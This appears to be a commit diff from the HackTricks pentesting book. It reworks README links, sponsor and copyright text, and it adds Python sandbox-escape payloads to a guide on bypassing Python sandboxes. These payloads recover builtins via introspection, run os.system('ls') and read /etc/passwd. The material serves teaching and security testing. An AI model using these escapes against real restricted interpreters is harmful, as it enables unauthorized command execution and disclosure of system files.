GitBook: [master] 517 pages modified

README.md

@@ -20,8 +20,8 @@ Here you will find the **typical flow** that **you should follow when pentesting
 
 **Click in the title to start!**
 
-If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)**\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.  
-**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **that will be reflected in this book.  
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)\*\*\*\*[**@carlospolopm**](https://twitter.com/carlospolopm).  
+**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book.  
 Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
 
 {% hint style="danger" %}
@@ -32,25 +32,25 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
 If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**  
 If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
+[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
+
 ## Corporate Sponsors
 
-### \*\*\*\*[**INE**](https://ine.com/)\*\*\*\*
+### [**INE**](https://ine.com/)
 
 ![](.gitbook/assets/ine_logo-3-.jpg)
 
-[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
-
-\*\*\*\*[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
-
-Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
+[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
 
 #### **Courses and Certifications reviews**
 
 You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their **respective preparation courses**\) in the following page:
 
 {% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
 
-\*\*\*\*
+
+
+Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
 
 **Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**
 

misc/basic-python/bypass-python-sandboxes.md

@@ -206,9 +206,13 @@ get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
 #### Python3
 
 ```python
-# Obtain the builtins from a defined function
-get_flag.__globals__['__builtins__'].__import__("os").system("ls")
+# Obtain builtins from a globally defined function
+print.__self__
+dir.__self__
+globals.__self__
 
+# Obtain the builtins from a defined function
+get_flag.__globals__['__builtins__']
 
 # The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__)
 [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')
@@ -227,6 +231,14 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__
 __builtins__["__import__"]('os').system('ls')
 ```
 
+### Builtins payloads
+
+```python
+# Possible payloads once you have found the builtins
+.open("/etc/passwd").read()
+.__import__("os").system("ls")
+```
+
 ### Discovering loaded variables
 
 Checking the **`globals`** and **`locals`** is a good way to know what you can access.